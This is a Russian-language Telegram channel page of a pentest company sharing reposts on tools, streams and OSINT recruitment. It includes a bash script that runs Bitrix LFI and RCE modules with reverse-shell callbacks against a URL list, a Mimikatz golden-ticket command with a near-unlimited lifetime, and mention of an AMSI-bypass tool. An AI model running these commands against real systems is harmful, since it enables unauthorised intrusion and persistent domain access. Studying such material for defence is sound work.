uk
Feedback
RESOLUTE ATTACK

RESOLUTE ATTACK

Відкрити в Telegram

⚡️RESOLUTE ATTACK - Компания по информационной безопасности YouTube - https://www.youtube.com/@RESOLUTE-ATTACK Chat - @RESOLUTECHAT Web Site - www.resolute-attack.com Обратная связь - @ResoluteAttack_Bot

Показати більше
7 299
Підписники
-324 години
-117 днів
-5330 днів
Архів дописів
Скоро в продажах

Repost from Bafomёd OSINT
2024 остановись
2024 остановись

👋 У Вас популярный канал — @RESOLUTEATTACK. Вашему каналу теперь доступно оформление внешнего вида, которое выделит его среди других. Настройки оформления — это эксклюзивный набор опций; Ваш канал должен достичь определённого уровня, чтобы Вы могли применить каждую из них. Предложите подписчикам проголосовать за канал по ссылке: https://t.me/RESOLUTEATTACK?boost. Чем больше у канала голосов, тем выше его уровень. С каждым новым уровнем открывается ещё больше возможностей. Вы также можете 🎁 разыграть призы; по итогам розыгрыша случайные подписчики получат Telegram Premium в подарок. За каждую разыгранную подписку Ваш канал получит 4 голоса. С недавнего времени проводить розыгрыши стало ещё удобнее — теперь Вы можете выбрать увеличенный срок проведения розыгрыша, добавить собственные призы и автоматически опубликовать список победителей при подведении итогов. С Новым годом! Желаем всего наилучшего Вам и Вашим подписчикам! 🚗

Informatsionnaya_Bezopasnost_Zaschita_I_Napadenie_3-E_Izd.pdf23.56 MB

CTF успех и у ламера есть, решенный Portswigger с HTB для мужчины - честь 🤌

Repost from Похек
🔥 quick-trics_auto.sh Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚 Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
        quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
        quick-tricks redirect -u $(sed -n "$i p" scope.txt)
        quick-tricks lfi -u $(sed -n "$i p" scope.txt)
        quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
        quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай. Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux. 🌚 @poxek

Repost from SecuriXy.kz
CrackMapExec - все... переходим на NetExec Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Exec
+1
CrackMapExec - все... переходим на NetExec Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др https://www.netexec.wiki Ставиться проще простого через pipx

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec
nxc
nxcdb
netexec

nxcdb
Для простоты восприятия можете добавить ~/.zshrc

alias cme=netexec
alias crackmapexec=netexec

Repost from Bafomёd OSINT
Запись вчерашнего стрима, мини обзор web версии. Запиь в облаке - https://cloud.mail.ru/public/Fr7y/CkhWFerFE

🛠 WEB APP PRTT IN PROGRESS....
+1
🛠 WEB APP PRTT IN PROGRESS....

🛠 WEB APP PRTT IN PROGRESS....
🛠 WEB APP PRTT IN PROGRESS....

Repost from 1N73LL1G3NC3
SharpKiller Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8 Live scan for new powershell processes every 0
SharpKiller Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8 Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances

⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста RA помогает в разработке документац
⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста RA помогает в разработке документации на русском, английском языке и в популяризации инструмента для Lateral Movement - GOST v3 Одной из особенностей нашего инструмента является возможность создания множества цепочек перенаправления, что является Must Have в тестировании AD, и больших корпоративных сетей Мы также создали бота для обратной связи, где вы можете напрямую обратиться к разработчикам данного инструмента и помочь в улучшении его - @gogostbot Документация: https://gost.run/en/ GitHub: https://github.com/go-gost/gost

Уверенно можем сказать, что это потенциальный аналог мальтего в будущем, работы для этого предстоит ещё очень много

Repost from Bafomёd OSINT
https://t.me/osint_san_framework?livestream=044837696e686ad90d Стрим по новому инструменту через 40 минут. Обязательно приходим

RAS-X | SI VIS PACEM, PARA BELLUM | RESOLUTE ACTIVE SECURITY - X ⚡️ Компания RESOLUTE ATTACK представляет уникальное для России предложение и новый продукт RAS X - RESOLUTE ACTIVE SECURITY X https://youtu.be/EOfbLgUeb9E?feature=shared

Repost from Schwarz_Osint
Добрый день участник, ты нам нужен! У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происхо
Добрый день участник, ты нам нужен! У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происходит работа над сообществом и нам нужны люди! — Отдел Расследований (NPID) занимается расследованиями публичных некоммерческих кейсов, разработкой методологий поиска информации по зарубежью и чуть-чуть черной магией. Если у тебя уже есть опыт в OSINT и ты хочешь развить свои навыки работая в команде, то тебе к нам! Примером его работы является недавний кейс по Ronaldo 18K; — Отдел Контента (NPCD) занимается формированием новостей, следит за новостями из мира Разведки и всячески формулирует наше видение OSINT-индустрии. Если у тебя есть опыт копирайтинга, редактуры, или тебе интересно разобраться в индустрии, то тебе сюда! Примером его работы является наш ежемесячный #vestnik Для того что б попасть в нашу команду, пиши: @northen_palmyra

photo content

⚡️ NEW WEBAPP FOR PRTT CERTIFICATION
⚡️ NEW WEBAPP FOR PRTT CERTIFICATION

Немногие знают о существовании фичи которую использовать нельзя, она позволяет создавать бесконечный golden ticket. С грустью вспоминаю те времена, когда можно было создать golden ticket без существующей учётки в домене Я думаю все знают, что по стандарту золотой билет создаётся на 10 лет. И все понимают, что существуют настраиваемые политики домена. Но командой /endin: можно корректировать время жизни тикета в минутах Remi Solberg из offsec выяснил (бородой по круче чем у берсерка), путём не сложной игрой битами, что максимальное время жизни golden ticket - 2147483647 минут. Это примерно 4000 лет. Но детект не заставит вас долго ждать. Или у вас это просто не получится сделать, так как все админы находятся в Protected Users. Использовать не рекомендую Mimikatz kerberos::golden /user:user /domain:domain /sid:domainsid /krbtgt:hash /endin:2147483647 /ticket:название Tadn3wb